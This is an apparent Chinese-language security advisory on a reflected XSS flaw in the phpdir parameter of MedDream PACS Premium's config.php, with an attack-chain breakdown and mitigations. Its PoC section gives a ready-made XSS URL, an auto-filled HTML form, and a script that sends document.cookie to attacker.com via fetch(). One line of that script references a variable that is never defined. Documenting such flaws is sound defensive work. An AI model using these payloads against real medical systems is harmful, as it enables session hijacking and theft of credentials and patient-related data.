CVE-2025-58093 MedDream PACS Premium config.php 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-58093

漏洞类型

反射型跨站脚本攻击（XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MedDream PACS Premium

漏洞概述

CVE-2025-58093是Cisco Talos情报团队发现的影响MedDream PACS Premium 7.3.6.870版本的反射型跨站脚本（XSS）漏洞。该漏洞存在于config.php功能模块中，主要影响phpdir参数。攻击者可以通过精心构造恶意URL，当受害者访问该URL时，嵌入的恶意JavaScript代码将在受害者浏览器上下文中执行，从而实现会话劫持、敏感信息窃取、钓鱼攻击等恶意操作。由于该漏洞为反射型XSS，需要诱导用户点击攻击者提供的恶意链接，因此需要一定的用户交互。CVSS 3.1评分为6.1，属于中等严重程度，对机密性和完整性产生低影响，对可用性无影响。

技术细节

该漏洞是典型的反射型XSS（Non-Persistent XSS）漏洞。攻击原理如下：1) 攻击者构造包含恶意JavaScript代码的特殊URL，恶意代码嵌入在phpdir参数中；2) 当用户访问该URL时，服务器从请求参数中获取phpdir值并直接反射到响应页面中，且未进行充分的输入验证和输出编码；3) 用户浏览器解析响应时，将恶意代码作为页面内容的一部分执行；4) 恶意JavaScript代码可以访问用户的会话Cookie、执行未经授权的操作、窃取敏感信息等。攻击条件：攻击者需要诱导用户点击恶意链接，通常通过钓鱼邮件、社交工程等方式实现。防御措施：1) 对所有用户输入进行严格验证；2) 对输出到HTML的内容进行适当的编码转义；3) 设置HttpOnly和Secure属性的Cookie；4) 实施内容安全策略（CSP）头部。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标系统中运行的MedDream PACS Premium版本，确认版本为7.3.6.870或受影响版本

STEP 2

漏洞探测

攻击者分析config.php页面，发现phpdir参数未对用户输入进行充分过滤和编码

STEP 3

恶意链接构造

攻击者构造包含XSS payload的恶意URL，如：config.php?phpdir=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

STEP 4

社会工程攻击

攻击者通过钓鱼邮件、即时消息或其他渠道诱导目标用户点击恶意链接

STEP 5

漏洞触发

用户点击链接后，服务器将phpdir参数值反射到响应页面，恶意JavaScript代码被嵌入并执行

STEP 6

恶意操作执行

恶意JavaScript代码在用户浏览器中执行，可窃取Cookie、会话令牌，或执行其他未经授权的操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-58093 PoC - Reflected XSS in MedDream PACS Premium config.php -->
<!-- Target: MedDream PACS Premium 7.3.6.870 -->
<!-- Attack Vector: Malicious URL with phpdir parameter -->

<!-- Example malicious URL -->
<!-- https://[TARGET]/config.php?phpdir=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -->

<!-- HTML Form for PoC demonstration -->
<form action="http://[TARGET]/config.php" method="GET">
    <input type="hidden" name="phpdir" value='"><script>alert(document.domain)</script>'>
    <input type="submit" value="Click to test XSS">
</form>

<!-- JavaScript PoC payload -->
<script>
    // Cookie stealing payload
    var stolenCookie = document.cookie;
    // Send cookie to attacker server
    fetch('https://attacker.com/log?c=' + encodeURIComponent(storedCookie));
    
    // Session hijacking payload
    fetch('https://attacker.com/collect?session=' + encodeURIComponent(document.cookie));
</script>

影响范围

MedDream PACS Premium 7.3.6.870

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 使用WAF对config.php页面进行XSS攻击特征过滤；2) 临时禁用config.php的非必要功能；3) 加强对用户访问config.php的日志监控；4) 对员工进行安全意识培训，提高对钓鱼攻击的警惕性；5) 实施严格的访问控制，限制对管理接口的访问。